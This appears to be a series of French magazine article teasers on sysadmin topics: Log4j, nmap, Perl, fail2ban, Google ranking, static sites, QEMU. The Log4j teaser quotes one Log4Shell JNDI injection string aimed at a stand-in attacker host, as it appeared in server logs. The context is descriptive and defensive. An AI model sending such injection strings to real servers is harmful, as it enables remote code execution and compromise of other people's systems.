Nous nous souviendrons tous un moment de ce vendredi après-midi quand les premières annonces sur log4j sont arrivées et que nous avons tous vu dans nos logs se multiplier les “${jndi:ldap://mechanthacker.com/a}” en l’espace de quelques minutes. Pour beaucoup d’entre nous, le week-end a été long, une course contre la montre pour éviter de se retrouver avec un système d’information ressemblant à un champ de ruines le lundi matin, ou tout aussi probablement une ferme de minage de cryptomonnaies. Une caractéristique particulière de cette faille a certainement été le niveau de massification des attaques en l’espace de quelques heures. Tout serveur accessible sur les ports 80 et 443, même non référencé par les moteurs de recherche s’est retrouvé attaqué depuis des adresses IP multiples dès vendredi après-midi. Il est probable que certains groupes de pirates disposent d’ores et déjà d’une grande quantité de serveurs compromis qu’ils pourront monétiser dans un second temps, par exemple avec des campagnes de ransomware.

Une fois n’est pas coutume, un outil obscur de hacker (un hacker n’est pas un cracker et encore moins un pirate) est célébré par l’industrie cinématographique. Nous allons présenter cet outil, nmap, pour montrer comment l’utiliser pour surveiller son réseau. Nous regarderons aussi son fonctionnement pour améliorer notre connaissance des réseaux et donc notre sécurité.

Depuis 1987, Perl a su évoluer et intégrer de nombreuses technologies jusqu’à éclipser son successeur Raku. Partons à la découverte de ce langage et de son riche écosystème afin de comprendre pourquoi il est toujours indissociablement lié à l’administration système.

Depuis les débuts d’Internet, on assiste à une augmentation régulière des débits réseaux, ce qui profite en premier aux utilisateurs, mais aussi aux attaquants. Je pense par exemple aux attaques de mots de passe par force brute, qui nous obligent à utiliser des mots de passe de plus en plus longs et compliqués. Pour lutter contre ce type d’attaques, il existe des logiciels permettant de ralentir, voire de bloquer les attaques, simples à utiliser, comme fail2ban.

Si les termes de Colibri, Panda ou Pingouin n’évoquent chez vous que des noms d’animaux, c’est que vous avez besoin de vous familiariser avec les algorithmes de référencement de Google.

Depuis plus d'une décennie déjà, la conception d'un site web est devenue tellement complexe qu'il est nécessaire – ou presque – de s'appuyer sur des frameworks de plus en plus sophistiqués. Mais que faire lorsque l'on a juste besoin d'un site statique sans fioritures ?

Le projet QEMU, qui offre une approche légère et peu intrusive pour l’émulation et la virtualisation, présente l’avantage d’être entièrement configurable en ligne de commandes. Nous verrons dans ces pages comment scripter les modifications de certaines caractéristiques d’une VM pendant son exécution en arrière-plan.

Dans cet article, nous verrons à quelle problématique majeure doit faire face le monde du numérique et plus particulièrement celui de l'informatique. Il n'est peut-être pas trop tard et nous pouvons encore réagir. Pour ce faire, je vous propose ici quelques pistes de réflexion et d'action possibles.